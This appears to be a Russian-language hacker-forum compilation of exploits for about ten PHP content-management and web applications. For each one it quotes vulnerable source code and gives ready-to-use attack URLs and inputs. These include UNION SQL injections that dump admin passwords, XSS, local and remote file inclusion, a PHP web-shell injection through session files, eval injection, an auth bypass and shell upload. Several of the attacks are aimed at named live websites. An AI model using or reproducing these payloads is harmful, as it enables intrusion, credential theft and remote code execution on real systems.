$query_log = sprintf("SELECT * FROM $dbTable WHERE id = '%s'", $id);
$log = mysql_query($query_log, $brewing) or die(mysql_error());
$row_log = mysql_fetch_assoc($log);
$totalRows_log = mysql_num_rows($log);

$query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style);
SQL
mq=off
http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default
post
style=-1' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,unh ex(hex(concat_ws(0x3a,user_name,password))) from users --


pXSS
для полей

name
address
city
state
zip
homePhone
workPhone
email
brewClub
brewName
still
dry
hydromel
petillant
semi
standard
sweet
sparkling
sack
special
waterTreatment
yeastLiquid
yeastDried
starter
yeastNutrients
carbonation
volumeC02
primingSugar
bottlingDate
finingsType
finingsAmount

по типу
http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default
post
city=<script>alert(121212)</script>

php-addressbook v5.4.6 - r276
http://sourceforge.net/projects/php-addressbook/

group.php
echo "<div class='msgbox'>Users added.<br /><i>Go to <a href='./?group=$group_name'>group page \"$group_name\"</a>.</i></div>";
...
<form accept-charset="utf-8" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
pXSS
http://localhost/addressbookv5.4.6/index.php?group=1<script>alert(121212)</script>
pXSS
mq=off
http://localhost/addressbookv5.4.6/group.php/>"><script>alert(121212)</script>

---------------------

include/dbconnect.php
$get_vars = array( 'id' );

foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = intval($_GET[$get_var]);
} elseif(isset($_POST[$get_var])) {
${$get_var} = intval($_POST[$get_var]);
} else {
${$get_var} = null;
}
}
echo $id, "<br />";

// Copy only used variables into global space.
$get_vars = array( 'searchstring', 'alphabet', 'group', 'resultnumber'
, 'submit', 'update', 'delete'
, 'new', 'add', 'remove', 'edit' );

foreach($get_vars as $get_var) {
if(isset($_GET[$get_var])) {
${$get_var} = mysql_real_escape_string($_GET[$get_var], $db);
} elseif(isset($_POST[$get_var])) {
${$get_var} = mysql_real_escape_string($_POST[$get_var], $db);
} else {
${$get_var} = null;
}
}
...
// To run the script on systeme with "register_globals" disabled,
// import all variables in a bit secured way: Remove HTML Tags

foreach($_REQUEST as $key => $value)
{
// Allow all tags in headers and footers
if($key == "group_header" || $key == "group_footer"){
${$key} = $value;

// Handle arrays
} elseif(is_array($value)) {
foreach($value as $entry)
{
${$key}[] = strip_tags($entry);
}
// Handle the rest
} else {
// ${$key} = htmlspecialchars($value); --chatelao-20071121, doesn't work with Chinese Characters
${$key} = strip_tags($value);
}

// TBD: prevent SQL-Injection
}
...

// ------------------- Group query handling ------------------------
//

$select_groups = "SELECT groups.*
, parent_groups.group_name parent_name
, parent_groups.group_id parent_id
FROM $table_groups AS groups
LEFT JOIN $table_groups AS parent_groups
ON groups.group_parent_id = parent_groups.group_id";

group.php
// Open for Editing
else if($edit || $id)
{
if($edit) $id = $selected[0];
if(! $read_only)
{
$result = mysql_query("$select_groups WHERE groups.group_id=$id",$db);

SQL
http://localhost/addressbookv5.4.6/group.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9+--+

-------------------------

edit.php
else if($id)
{
if(! $read_only)
{
$result = mysql_query("SELECT * FROM $base_from_where AND $table.id=$id",$db);
SQL
http://localhost/addressbookv5.4.6/edit.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23+--+

cms chicomas Ver : 2.0.4
http://sourceforge.net/projects/chicomas/

functions.php
function SetLanguage() {
global $defaultlanguage;

$obj_language = new CLanguage();
$obj_languagearray = new CLanguageArray();
$obj_languageengine = new CLanguageEngine();

if (!$_REQUEST['lang']){
// No change request of language
if (!session_is_registered("lang")){
//No Registered
$lang = $defaultlanguage;
session_register("lang");
$_SESSION['lang'] = $lang;
}
else{
//Registered
}
}
else{
//Change request of language
$lang = $_REQUEST['lang'];
$obj_language = $obj_languageengine->GetLanguage($lang);


if ($obj_language!=null){
if (session_is_registered("lang")){
$_SESSION['lang'] = $lang;
}
else{
if ($lang =="")
$lang = $defaultlanguage;
session_register("lang");
}
}
}

$lang = $_SESSION['lang'];

switch (strtolower($lang)){
default:
case "tr":
$charset = "iso-8859-9";
break;
case "en":
$charset = "iso-8859-1";
break;
case "de":
$charset = "iso-8859-1";
break;
}

if (session_is_registered("charset")){
$_SESSION['charset'] = $charset;
}
else{
if ($charset =="")
$charset = "iso-8859-9";
session_register("charset");
}

//Include Language File
include("languages/".strtolower($_SESSION['lang'])."/language.php");
}
Если $obj_language = $obj_languageengine->GetLanguage($lang); вернет не пустой результат,
значение $lang = $_REQUEST['lang']; занесется в сессию и затем проинклудится
include("languages/".strtolower($_SESSION['lang'])."/language.php");

смотрим
objects/obj_languages.php
class CLanguageEngine {
function GetLanguages($active){
$o_dataaccess = new CDataAccess();
return $o_dataaccess->GetLanguages($active);
objects/obj_dataaccess.php
function GetLanguage($lang) {

$sql = "SELECT * FROM languages ";
$sql .= "WHERE lang='".strtolower($lang)."' ";
$sql .= "AND active='1'";
//echo "SQL:".$sql."<br>";

$db = new db();
$db->db_connect();
if ($db->is_connected()){
$db->db_query($sql);
while ($row = $db->get_row()) {
$o_language = new CLanguage($row);
}
$db->db_disconnect();
}
return $o_language;
}
при mq=off
SQL
http://localhost/chicomas/index.php?lang=en'+union+select+1,2,3,4,version(), 6+--+

SQL+LFI
http://localhost/chicomas/index.php?lang=/../../../../../../../boot.ini%00'+union+select+1,2,3,4,5,6+--+

Shell
если нашли сессию, получаем шелл, например так: (используем два разных браузера)

opera, заливаем шелл в сессию
http://localhost/chicomas/index.php?lang='+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,5,6+--+

firefox, инклудим сессию
http://localhost/chicomas/index.php?lang=/../../../../../../../Server/PHP/TMP/sess_be2c81ce822253b08bfa181ee5b7cf9d%00'+union+se lect+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,version(),6+--+&pass=dir

-------------------

tools/mysqlbackuppro/index.php
/*
* Locale Setting
*/
$locale = gonxlocale::init();
if (!isset($locale) or $locale=="") {
$locale = $GonxAdmin["locale"];
}
require_once("locale/".$locale.".php");

tools/mysqlbackuppro/libs/locale.class.php
class gonxlocale{
/**
* Constructor
* @access protected
*/
function locale(){

}

/**
*
* @access public
* @return void
**/
function init(){
global $locale,$GonxAdmin,$HTTP_SESSION_VARS;
if (session_is_registered('gonxlocale') and !isset($_GET["locale"])) {
$locale = $HTTP_SESSION_VARS["gonxlocale"];
} elseif (!isset($_GET["locale"])) {
$locale = $GonxAdmin["locale"];
session_register('gonxlocale');
$gonxlocale = $locale;
} elseif (isset($_GET["locale"])) {
if (is_file("locale/".$_GET["locale"].".php")) {
session_register('gonxlocale');
$HTTP_SESSION_VARS["gonxlocale"] = $_GET["locale"];
}
}
return $locale;
}
LFI
mq=off
http://localhost/chicomas/tools/mysqlbackuppro/index.php?locale=../../../../../../boot.ini%00

AdaptCMS Lite v1.5 - NEW
www.adaptcms.com

pXSS
mq=off
http://localhost/adaptcms_lite_1.5/index.php
post
skin=1>"><script>alert(121212);</script>

http://localhost/adaptcms_lite_1.5/?cat=1'+><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/index.php?view=redirect&url=1'+><script>alert(121212);</script>
http://localhost/adaptcms_lite_1.5/index.php/>'><script>alert(121212)</script>

-----------------------

index.php
$_GET['id'] = str_replace("/","",stripslashes(check($_GET['id'])));

$sql = mysql_query("SELECT * FROM ".$pre."pages WHERE url = '".$_GET['id']."'");

functions.php
function check($val) {
// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
// this prevents some character re-spacing such as <java\0script>
// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
$val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val);

// straight replacements, the user should never need these since they're normal characters
// this prevents like <IMG SRC=&#X40&#X61&#X76&#X61&#X73&#X63&#X72&#X69&#X70&#X74&#X3A&#X61&#X6C&#X65&#X72&#X74&#X28&#X27&#X58&#X53&#X53&#X27&#X29>
$search = 'abcdefghijklmnopqrstuvwxyz';
$search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$search .= '1234567890!@#$%^&*()';
$search .= '~`";:?+/={}[]-_|\'\\';
for ($i = 0; $i < strlen($search); $i++) {
// ;? matches the ;, which is optional
// 0{0,7} matches any padded zeros, which are optional and go up to 8 chars

// &#x0040 @ search for the hex values
$val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ;
// @ @ 0{0,7} matches '0' zero to seven times
$val = preg_replace('/(�{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ;
}

// now the only remaining whitespace attacks are \t, \n, and \r
$ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base', 'img');
$ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload');
$ra = array_merge($ra1, $ra2);

$found = true; // keep replacing as long as the previous round replaced something
while ($found == true) {
$val_before = $val;
for ($i = 0; $i < sizeof($ra); $i++) {
$pattern = '/';
for ($j = 0; $j < strlen($ra[$i]); $j++) {
if ($j > 0) {
$pattern .= '(';
$pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?';
$pattern .= '|(�{0,8}([9][10][13]);?)?';
$pattern .= ')?';
}
$pattern .= $ra[$i][$j];
}
$pattern .= '/i';
$replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag
$val = preg_replace($pattern, $replacement, $val); // filter out the hex tags
if ($val_before == $val) {
// no replacements were made, so exit the loop
$found = false;
}
}
}
return strip_tags($val, "<p><a><font><b><i><u><span><em><div><li><ul><ol><center><blockquote>");
}

SQL
mq=off
http://localhost/adaptcms_lite_1.5/?view=page&id=-1'+union+select+1,user(),3,version(),5,6+--+

-------------------------------------

index.php
...
if ($_GET['field'] or $_GET['data']) {
$sql = mysql_query("SELECT * FROM ".$pre."fielddata WHERE".$fddata." ORDER BY `id` DESC".$lim);
} else {
if ($_GET['abc']) {
if ($_GET['cat']) {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);
} else {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim);
}
} else {
if ($_GET['cat']) {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = ''".$adate." ORDER BY `id` DESC".$lim);
} else {
$sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = ''".$adate." ORDER BY `id` DESC".$lim);
}
}
}
while($r = mysql_fetch_array($sql)) {

unset($data, $datas, $pab, $rab, $name1, $link1, $n, $m, $y, $x, $i, $id, $name, $relations_id, $relations_sec, $s, $fetch, $get, $dats, $fname, $lid, $lids, $b, $sqlst, $k, $data23, $check);

...
$pab[0] = "{link}";
$pab[1] = "{date}";
$pab[2] = "{story}";
$pab[3] = "{comments}";
$pab[4] = "{cnum}";
$pab[5] = "{pcomment}";
$pab[6] = "{author}";
$pab[7] = "{section}";
$pab[8] = "{cat}";
$pab[9] = "{url}";
$pab[10] = "{title}";
....
$pab[30] = "{".$r[section]."_name}";
$pab[31] = "{".$r[section]."_username}";
$pab[32] = "{".$r[section]."_id}";
$pab[33] = "{".$r[section]."_views}";
$pab[34] = "{".$r[section]."_votes}";
$pab[35] = "{".$r[section]."_social_icons}";

...

// start - custom fields
$name = "";$data = "";$row = "";
$sql_cf = mysql_query("SELECT * FROM ".$pre."fields WHERE cat = '".$r[section]."' OR cat = 'user-profile'");
while ($row = mysql_fetch_array($sql_cf)) {
$name = "$row[name]";

$data = mysql_fetch_row(mysql_query("SELECT data FROM ".$pre."fielddata WHERE fname = '".$name."' AND aid = '".$r[id]."'"));
$fdata[$name] = $data[0];

if ($data[0]) {
$n = $n + 1;
$pab[$n] = "{".$name."}";
$n = $n + 1;
$pab[$n] = "{".$r[section]."_".$name."}";
$m = $m + 1;
if ($row[type] == "textarea") {
$rab[$m] = parse_text($data[0]);
$m = $m + 1;
$rab[$m] = parse_text($data[0]);
} else {
$rab[$m] = stripslashes(html_entity_decode($data[0]));
$m = $m + 1;
$rab[$m] = stripslashes(html_entity_decode($data[0]));
}
} else {
$n = $n + 1;
$pab[$n] = "{".$name."}";
$n = $n + 1;
$pab[$n] = "{".$r[section]."_".$name."}";
$m = $m + 1;
$rab[$m] = "";
$m = $m + 1;
$rab[$m] = "";
}
}
// end - custom fields

...

eval (" ?>" . str_replace($pab, $rab, stripslashes($temp[0])) . " <?php ");

...

Выбирается шаблон ($temp[0]) и в нем поля (массив $pab) заменяются на конкретное содержание (массив $rab).

Чтобы выполнить свою команду, нужно добавить в массивы по элементу, где
$pab[400] = "{cat}"; ( такое поле есть в шаблоне $temp[0] )
$rab[400] = "php code"; (наша команда или скрипт)

этому препятсвует unset
unset($data, $datas, $pab, $rab, ...);

Приходится использовать unset багу.

сформируем hash_del_key для php5
для pab = 2090607416
для rab = 2090679290


Eval
register_globals = On
версия php, уязвимая для UNSET WHACKING

http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090607416[400]=1&2090679290[400]=1

http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090679290=1

cms jetbox
http://sourceforge.net/projects/jetboxone/
dork:"Powered by Jetbox CMS ™"

Поддерживает УРЛ стандартного типа, но работает со своим
if ($use_standard_url_method==true) {
$url = explode("/",$url_to_split[1]); // Splits URL into array
---------------------------

phpinfo

http://localhost/jetbox/includes/phpinfo.php
http://www.js.mlc.edu.tw/php/jetbox/includes/phpinfo.php

---------------------------

index.php
if (isset($view)) {
$dodefaultpage=false;
$sql2="SELECT * FROM navigation WHERE view_name='".$view."'";
$r2 = mysql_prefix_query($sql2) or die(mysql_error()." q: ".$sql2."<br /> Line: ".__LINE__." <br/>File: ".__FILE__);
if ($ra2 = mysql_fetch_array($r2)){
//echo $ra2["file_name"];
include($ra2["file_name"]);
}

SQL+LFI
mq=off
rg=on
http://localhost/jetbox/?view=1'+union+select+1,"/boot.ini%",3,4,5,6,7,8,9,10,11,12+--+
http://www.egyptiancorner.org/ec/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6 ,7,8,9,10,11,12+--+

SQL+RFI
magic_quotes_gpc = Off
register_globals = On
allow_url_include = On
http://localhost/jetbox/?view=-1'+union+select+1,"http://www.site.com/shell.txt",3,4,5,6,7,8,9,10,11,12+--+
http://ghostwriterreviews.com/jetbox/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6 ,7,8,9,10,11,12+--+

----------------------------

blogs.php
...
if ($item<>'' && is_numeric($item)) {
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id AND struct.id=".$item;
}
elseif($option=='last10'){
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC LIMIT 10";
}
else{
$sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC";
}
#echo $sqlselect1;

$result1 = mysql_prefix_query ($sqlselect1) or die (mysql_error());
$blogscount= mysql_num_rows($result1);
if ($blogscount>'0') {
$view_tpl = new Template("./");
$view_tpl->set_file("block", "blogs_item_tpl.html");
$view_tpl->set_block("block", "blogs","blogsz");
$view_tpl->set_var(array("absolutepathfull"=>$absolutepathfull ));

while ($resultarray = mysql_fetch_array($result1)){
$records[1][5]=$resultarray["b_id"];
ob_start();
loggedin_workflow();
$containera = ob_get_contents();
ob_end_clean();

...

if ($item<>'' && is_numeric($item)) {
//$t->set_var("containera", "add comments", true);
$sqlselect1 = "SELECT * FROM blog_comments WHERE blog_id=".$id." ORDER BY blog_comments.c_id ASC";
$result1 = mysql_prefix_query($sqlselect1) or die (mysql_error());
$blog_commentcount= mysql_num_rows($result1);
if ($blog_commentcount>'0') {
$view_tpl2 = new Template("./");
$view_tpl2->set_file("block", "blog_comment_item_tpl.html");
$view_tpl2->set_block("block", "blog_comment","blog_commentz");
...

SQL
rg=on
http://localhost/jetbox/index.php?view=blog&item=1&id=1+union+select+1,2,user_password,4,5,type,user_ password+from+user+--+
http://localhost/jetbox/view/blog/item/1/id/1+union+select+1,2,user_password,4,5,type,user_pas sword+from+user+--+
Работает, если в блоге есть хотя бы одна запись.
Получаем логин и пароль (не хеш) от админки.

iGaming CMS
Product : iGaming CMS
version : 1.5
site : forums.igamingcms.com
SQL injection
mq=off
games.php
$sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publis her`,`release_date` FROM `sp_games` ";

if (!empty($_REQUEST['title'])) {

$sql .= "WHERE `title` LIKE '$_REQUEST[title]%' ";

if (!empty($_REQUEST['section'])) {

$sql .= " AND `section` = '$_REQUEST[section]' ";

}

$sql .= " AND `published` = '1' ";

} else {

if (!empty($_REQUEST['section'])) {

$sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' ";

} else {

$sql .= "WHERE `published` = '1' ";

...

if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publis her`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC")
http://localhost/games.php?order=genre&section=%27+and+1=0+union+all+select+1,version%28% 29,3,4,5,6,7--+&sort=
index.php
http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6 ,7,8,9--+
previews.php
$preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'");
http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+

Admin Panel (SQL inj) (LFI)
LFI : support.php
require_once("../sources/docs/$_REQUEST[id].php");
http://localhost/admin/support.php?id=../../file%00
SQL injection : screenshots.php
mq=off
if (isset($_REQUEST['s'])) {
$latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC");
http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,ve rsion(),3--+

Stash CMS 1.0.3

1) bypass (требования: mq=off)

file: /admin/library/authenticate.php


function login($username,$password,$remember,$location){
$database = new Db();
$results = $database->sqlQuery("SELECT user_key,user_firstname,user_lastname, user_admin FROM ".TBPREFIX."_user WHERE user_password = '$password' AND user_username = '$username'");
if($results){
foreach($results as $results){
$userkey = $results['user_key'];
$firstname = $results['user_firstname'];
$lastname = $results['user_lastname'];
$admin = $results['user_admin'];
}
$name = $firstname." ".$lastname;
$uniquekey = $name.$userkey;
$uniquekey = md5($uniquekey);
$_SESSION['username'] = $name;
$_SESSION['userkey'] = $userkey;
$_SESSION['uniquekey'] = $uniquekey;
$_SESSION['admin'] = $admin;
if ($remember == true){
setcookie("bsm", $userkey, time()+108000); /* expire in 30 days */
setcookie("msb", $uniquekey, time()+108000); /* expire in 30 days */
}
header('location:'.$location);
}else{
return false;
}
}


result:

login: ' or '1'='1
pass: asd

-------------------
боян
-------------------

3) blind sql injection (требования: mq=off,желательно 5 ветка бд)

file: resetpassword.php

$username = $_POST['username'];
$check = $database->sqlQuery("SELECT count(*) as cnt FROM ".TBPREFIX."_user WHERE user_username = '$username'",TRUE,FALSE);
if($check['cnt'] == 0){
if ($username == '') {
$msg = 'You must enter your Username';
}else {
$msg = $username. " doesn't exist";
}


result:

Тыкаем в /admin/login.php Forgot your password, в поле username пишем :

'/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)/**/and/**/'1'='1

......

Ресурс http://download.ru/products/tiger-cms
редактирование раздела в админке файл edit.php... check_var($_GET['id']);
$id_site = $_GET['id'];
$get_site = mysql_query("SELECT * FROM content WHERE razdel_id = '".$id_site."' LIMIT 1");
if(mysql_num_rows($get_site) == 0)
{
mysql_query("INSERT INTO content(razdel_id,text) VALUES('".$id_site."','Текст')");
}

$get_site = mysql_query("SELECT * FROM content WHERE razdel_id = '".$id_site."' LIMIT 1");
list($id,$razdel_id_id,$text) = mysql_fetch_array($get_site);

$get_razdel_name = mysql_query("SELECT name FROM razdeli WHERE id='".$id_site."' LIMIT 1");
list($razdel_name) = mysql_fetch_array($get_razdel_name);...функи� � ис /admin/functions.php :

...
function check_var($var)
{
if(!isset($var))
{
die ("<script language='Javascript'>function reload() {location = \"index.php\"}; setTimeout('reload()', 0);</script>");
}
}
...
1) SQL inj:
http://site/admin/index.php?module=razdel&task=edit&id=-5'+union+select+1,2,version()--+
Вывод в редактор !!!
2) Путь если ошибки включены.

Файл admin\modules\razdel\delete.php:... check_var($_GET['id']);
$id = $_GET['id'];
mysql_query("DELETE FROM razdeli WHERE id = '".$id."' LIMIT 1");
mysql_query("DELETE FROM content WHERE razdel_id = '".$id."' LIMIT 1");
echo 'Раздел удален'; ...
1) SQL inj:
http://site/admin/index.php?module=razdel&task=delete&id=18'[SQL]

Файл admin\modules\razdel\save_content.php:
... check_var($_GET['site_id']);
check_var($_POST['text']);
check_var($_POST['razdel_name']);
mysql_query("UPDATE razdeli SET name = '".$_POST['razdel_name']."' WHERE id='".$_GET['site_id']."' LIMIT 1");
mysql_query("UPDATE content SET text = '".$_POST['text']."' WHERE razdel_id = '".$_GET['site_id']."' LIMIT 1");
echo 'Раздел обновлен';...

1) SQL inj:
нужно еще устанавливать пост: $_POST['text'], $_POST['razdel_name'] если не будет -переадресация ...
1. site/index.php?module=razdel&task=save_content&site_id=13'[SQL]
2. $_POST['razdel_name']'[SQL] должны быть установлены:
- $_POST['text']
- action: admin/index.php?module=razdel&task=save_content&site_id=13
3. $_POST['text']'[SQL]
должны быть установлены:
- $_POST['razdel_name']
- action: index.php?module=razdel&task=save_content&site_id=13

Файл admin\modules\news\edit.php :
... check_var($_GET['id']);
$id = $_GET['id'];

$get_news_e = mysql_query("SELECT id,title,text,alltext FROM news WHERE id='".$id."' LIMIT 1");
list($id_news_e,$title_e,$text_e,$alltext_e) = mysql_fetch_array($get_news_e); ...

1) пути;
2) http://localhost/triger/center3/admin/index.php?module=news&task=edit&id=6'[SQL];
пример:
http://site/admin/index.php?module=news&task=edit&id=-6'+union+select+1,2,3,4--+

Файл admin\modules\news\create.php:
... check_var($_POST['title']);
$title = $_POST['title'];
check_len($title,200);
clear_my_string($title);
$date = date("Y-m-d");

mysql_query("INSERT INTO news(title,text,alltext,date) VALUES('".$title."','".$_POST['text']."','".$_POST['alltext']."','".$date."')"); ...
1) SQL inj $_POST['alltext']'[SQL]
обязательны:
- $_POST['text']'
2) SQL inj $_POST['text']'[SQL]
обязательны:
- $_POST['alltext'];

Файл admin\modules\news\delete.php:
... check_var($_GET['id']);
$id = $_GET['id'];
mysql_query("DELETE FROM news WHERE id = '".$id."' LIMIT 1");
echo 'Новость удалена'; ...
1) http://site/admin/index.php?module=news&task=delete&id=6'[SQL]

Файл \admin\modules\news\save_news.php:
... check_var($_GET['id']);
check_var($_POST['title']);
check_var($_POST['text']);
check_var($_POST['alltext']);
$id = $_GET['id'];
$title = $_POST['title'];
$text = $_POST['text'];
$all_text = $_POST['alltext'];
$date = date("Y-m-d");
mysql_query("UPDATE news SET title = '".$title."',text = '".$text."',alltext = '".$all_text."',date='".$date."' WHERE id='".$id."' LIMIT 1");
echo 'Новость обновлена'; ...
1) SQL injection не привожу, аналогично, за пост не забываем ...

Файл \admin\modules\tags\save.php :
1) SQL inj update...

Условия:
1) mg=off;
2) админка;

Jojo CMS 1.0 Release Candidate 2

Официальный сайт: http://www.jojocms.org/
Последняя версия: Jojo CMS 1.0 Release Candidate 2(релиз 28 сентября 2009)

1)SQL-Injection

Требования:

отсутствуют.

Путь до уязвимого скрипта:

../gelato/index.php

Эксплуатация(по умолчанию админские данные лежат в таблице "gel_users"):

http://127.0.0.1/gelato/gelato/index.php?post=100500+union+select+1,concat%28user %28%29,0x3a,version%28%29,0x3a,database%28%29%29,3 ,4,5,6,7+--+

Реальный сайт:

http://jazzfaggot.ru/index.php?post=100500+union+select+1,concat(versio n(),0x3a,user(),0x3a,database()),3,4,5,6,7+--+

Причина возникновения уязвимости:

ошибка в логике проверки получаемых данных.


if (isset($_GET["post"])) {
$id_post = $_GET["post"];
if (!is_numeric($id_post) && $id_post < 1 ){ //достаточно выполнить только одно условие, для того чтобы пройти проверку на корректность
header("Location: index.php");
}
} else {
if (isset($param_url[1]) && $param_url[1]=="post") {
$id_post = (isset($param_url[2])) ? ((is_numeric($param_url[2])) ? $param_url[2] : NULL) : NULL;
} else {
$id_post = NULL;
}
}


2) SQL-Injection(админка)

Требования:

доступ к администраторской панели

Путь до уязвимого скрипта:

../gelato/gelato/admin/user.php

Эксплуатация:

http://127.0.0.1/gelato/gelato/admin/user.php?edit=2+union+select+1,2,3,4,5,6,7

Причина возникновения уязвимости:

полное отсутствие фильтрации.


3)Path dislocure:

Требования:

вывод ошибок.

Путь до уязвимого скрипта:

../gelato/index.php

Эксплуатация:

http://127.0.0.1/gelato/gelato/index.php?post[]=100500

Реальный сайт:

http://madsc.iz.rs/index.php?post[]=8

4)Заливка шелла

Требования:

доступ в админку.

Путь до уязвимого скрипта:

../gelato/admin/index.php

Код уязвимого скрипта:

if ($_POST["type"]=="2") { //слово "photo" переводится в числовой аналог скриптом, проинклюженным до этого
if (isset($_POST["url"]) && $_POST["url"]!="") {
$photoName = getFileName($_POST["url"]); //проверки на расширение нет-с
if (!$tumble->savePhoto($_POST["url"])) {
header("Location: ".$conf->urlGelato."/admin/index.php?photo=false");
die();
}
$_POST["url"] = "../uploads/".sanitizeName($photoName); }
[B]
Эксплуатация:

http://127.0.0.1/gelato/gelato/admin/index.php?new=photo

В качестве фотографии выбираете ваш шелл, любое расширение, создаёте пост. Шелл будет загружен в папку uploads.

Для того чтобы не спалить шелл на главной странице удалите ваш пост, шелл при этом удалён не будет.

Также уязвим модуль загрузки фотографии\музыки\видео\ит� �.[/I]

Причина возникновения уязвимости:

отсутствие проверки на расширение.

5)Активная XSS

Требования:

включена возможность комментирования.

Путь до уязвимого скрипта:

../gelato/index.php

Уязвимое поле:

<textarea name="content" id="content" cols="100" rows="10" tabindex="4"></textarea>


Эксплуатация:

занесите в уязвимое поле ваш java-script, предварительно закрыв тэг(">)

Сайт с алертом: http://madsc.iz.rs/index.php/post/37.

WORK system CMS e-commerce
http://sourceforge.net/projects/worksystem/

module/catalogue/view_catalogue.php
$select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : "";

...

#read data of product supplier : addresses
$error_select = "";
$total_select = 0;
$query_selecta = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,b.POSTCODE as POSTCODEA,b.ADDRESS as ADDRESSA,b.TOWN as TOWNA,b.COUNTRY as COUNTRYA,b.USERNAME as USERNAMEA,b.EMAIL as EMAILA,b.PHONE as PHONEA,b.WEB_SITE as WEBSITEA
FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."USER b
where ID_CATALOGUE=".$select_catalogue." and a.CREATOR=b.USERID ";

...

$query_select = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,c.POSTCODE,c.ADDRESS, c.TOWN,c.COUNTRY,c.EMAIL,c.COMPANY_NAME,c.PHONE
FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."SHOPPING_DELIVERY c
where ID_CATALOGUE=".$select_catalogue." and c.USERID=a.CREATOR";

...

$query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME,
UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS,
PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PER IOD_DELIVERY,
COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,RE FERENCE_FREE
FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue";
SQL
